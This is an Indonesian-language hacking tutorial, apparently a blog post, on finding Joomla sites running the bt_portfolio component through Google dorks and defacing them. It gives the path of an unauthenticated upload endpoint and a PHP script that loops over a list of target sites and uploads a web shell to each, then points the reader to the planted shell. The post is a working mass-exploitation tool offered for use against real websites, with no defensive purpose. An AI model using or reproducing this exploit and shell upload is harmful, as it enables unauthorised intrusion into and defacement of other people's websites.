bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v ) - PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
Langsung intip Tutorialnya
1. Search di google dgn dork:
Dork:
inurl:/index.php?option=com_bt_portfolio
inurl:/bt_portfolio
(Kembangin lg biar dpt banyak web yg vuln and verawan kak)
2. Pilih salah satu web target, dan masukan exploit:
/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php
3. Vuln = Blank
(kalo gak salah wkwkwk)
4).Buat File Baru Berekstensi .php Contoh btport.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn btport.php tadi
<?php
$get=file_get_contents($argv[1]);
$j=explode("\r\n",$get);
foreach($j as $site){
echo "\n\n\t[+] Uploading file to : ".$site;
$uploadfile="shell.php";
$ch =curl_init("trget/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",'folder'=>"/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);{
print "\n\n\n$postResult";
echo "\n\n\t";
}
}
?>
4. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
5. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php
6. jika sukses , akan muncul nama shell sobat di CMD
7. Shell Akses: www.target.co.li/namashellsobat.php
..done..
Hahahaha Sekian tutorial kali ini.
numpang ngiklan..
Download MiniGames Android TKJ JumpMan.
<re/code> By: TKJ Cyber Art
Link:
- Google Drive
- sharebeast
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Happy Joomla Hacked !!
Sekian dan semoga bermanfaat .. terimakasih
0 Comments